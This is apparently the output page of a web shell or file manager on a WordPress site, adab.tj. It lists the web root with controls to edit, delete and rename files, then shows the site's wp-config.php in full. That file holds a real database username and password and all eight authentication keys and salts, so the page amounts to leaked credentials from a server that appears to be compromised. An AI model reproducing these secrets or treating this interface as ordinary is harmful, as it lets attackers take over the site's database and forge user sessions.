- Таблиғ -
- Таблиғ -
Current Dir: /var/www/adab.tj/html/
[FILE] .htaccess [ edit | delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wordpress-6.7.1-ru_RU.zip [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR] wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR] wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR] wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[DIR] www [ delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]
Viewing: /var/www/adab.tj/html/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'adab' );
/** Database username */
define( 'DB_USER', 'adab' );
/** Database password */
define( 'DB_PASSWORD', 'TmoSB5P25OwPIqGO' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
define( 'WP_MEMORY_LIMIT', '256M' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'zP^GiH95_qJLH^3a(FJ-d{0- ?{Tgj{=-/b[7MJG>gCJmiAZd0YB;}m?*XzNG5cc' );
define( 'SECURE_AUTH_KEY', '>qi`/Cc_0%onK16{MQ?s9fW:RAe$GXsS9zQReRQm3SKAJ_.c(m}hkm5~-=no.BX.' );
define( 'LOGGED_IN_KEY', 's:v-`]OYGG$7~sQCU)mlQ7Ow}s`,Geib ne>61/5v8F7SzPYH&(=Bt/c3!/-c<lG' );
define( 'NONCE_KEY', 'jhtE*qlq`-;B2@1%zjS30$]@:oBV[.&f]|4&_;a-7 lA1}os*hhD-vYAeNr^(Z|8' );
define( 'AUTH_SALT', 'Eq1oMfUa_].uv#RKyw(1?e+,2:O)i7D_.UO~J2FP8#m[qk04LboyEDtN]?xuq<s)' );
define( 'SECURE_AUTH_SALT', ' ~g:rQnm.OR{7`>>ZVt8}#<<?i u&c`YXhN}SDXcivSY4EXmwF!p_ZpyFEDk}Qec' );
define( 'LOGGED_IN_SALT', 'HX<y(qnt]ze.J3@@r,&S6[a(tIugyMa(hI-lq&0.8[j&t;oH50.+rg1D9w@Kv$? ' );
define( 'NONCE_SALT', 'C|A]|An|uw>z(jT_Gm)w#?n;]SRd.9z<hOEe}~/0`/hs}?YE q@cNxSes!sn|vlu' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
define( 'FS_METHOD', 'direct' );
define( 'WPLANG', 'ru_RU' ); // указываем файл локализации;
define( 'EMPTY_TRASH_DAYS', false ); // отключаем корзину;
define( 'WP_POST_REVISIONS', false ); // отключаем ревизии записей;
define( 'DISABLE_WP_CRON', true ); // отключаем работу cron;
define( 'AUTOSAVE_INTERVAL', 120 ); // увеличиваем интервал автосохранения
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';